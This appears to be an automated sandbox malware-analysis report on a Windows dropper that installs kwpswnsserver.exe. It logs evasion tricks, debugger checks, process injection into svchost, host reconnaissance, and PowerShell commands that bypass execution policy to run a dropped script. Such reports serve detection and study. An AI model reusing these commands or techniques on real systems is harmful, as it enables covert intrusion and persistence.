Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-111408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeWindow / User API: threadDelayed 5725Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4284Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 632Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8319Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1348Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeDropped PE file which has not been started: C:\Users\Public\Bilite\linit-v4.1.6.exeJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_3-111211
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeAPI coverage: 7.7 %
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe TID: 7628Thread sleep time: -73000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe TID: 7624Thread sleep time: -63000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe TID: 8184Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe TID: 7516Thread sleep time: -57250s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4432Thread sleep count: 252 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 4284 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 632 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4192Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 8319 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3164Thread sleep count: 1348 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3808Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5436Thread sleep count: 262 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7856Thread sleep count: 261 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6640Thread sleep count: 170 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeThread sleep count: Count: 5725 delay: -10Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8C816F __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,3_2_6C8C816F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C9DF0FC FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6C9DF0FC
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C9DF04B FindFirstFileExW,3_2_6C9DF04B
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_042780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_042780F0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04275430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_04275430
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeThread delayed: delay time: 73000Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: kwpswnsserver.exe, 00000003.00000002.3559349885.0000000001292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFB
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeAPI call chain: ExitProcess graph end nodegraph_3-111625
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B569D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004B569D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C880EC8 OutputDebugStringA,GetLastError,3_2_6C880EC8
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0428054D VirtualProtect ?,-00000001,00000104,?3_2_0428054D
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004C3580 mov eax, dword ptr fs:[00000030h]3_2_004C3580
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004BB6CA mov eax, dword ptr fs:[00000030h]3_2_004BB6CA
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004AF050 GetErrorInfo,SysFreeString,SysStringLen,GetProcessHeap,HeapFree,SysFreeString,CoTaskMemFree,CoTaskMemFree,3_2_004AF050
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B2069 SetUnhandledExceptionFilter,3_2_004B2069
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B569D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004B569D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B1853 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004B1853
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B1ED5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004B1ED5
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,3_2_0427DF10
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0427F00A
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04281F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_04281F67
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8F8646 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C8F8646
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C9D1DD8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C9D1DD8
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C89D636 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C89D636

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Contains functionality to inject code into remote processes
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_042777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_042777E0
Contains functionality to inject threads in other processes
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_042777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_042777E0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe3_2_042777E0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe3_2_042777E0
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: kwpswnsserver.exe, 00000003.00000003.2893370449.0000000005493000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.3390981770.0000000005493000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager
Source: kwpswnsserver.exe, 00000003.00000002.3561172783.0000000005493000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_0040D72E cpuid 0_2_0040D72E
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00401F9D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: EnumSystemLocalesW,3_2_004C87F5
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: EnumSystemLocalesW,3_2_004C8840
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: EnumSystemLocalesW,3_2_004C88DB
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: EnumSystemLocalesW,3_2_004C0959
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_004C8966
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,3_2_004C8BB9
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004C8CDF
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,3_2_004C8DE5
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,3_2_004C0E1E
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_004C8EB4
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_04275430
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6C9E60AA
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,3_2_6C9E6003
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,3_2_6C9E61B0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6C9E5C31
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: EnumSystemLocalesW,3_2_6C9E5E84
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,3_2_6C9E5EE3
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW,3_2_6C8A5F91
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: EnumSystemLocalesW,3_2_6C9E5FB8
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6C9E5945
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: EnumSystemLocalesW,3_2_6C9E5B96
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: EnumSystemLocalesW,3_2_6C9DBB1B
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: GetLocaleInfoW,3_2_6C9DB4FC
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
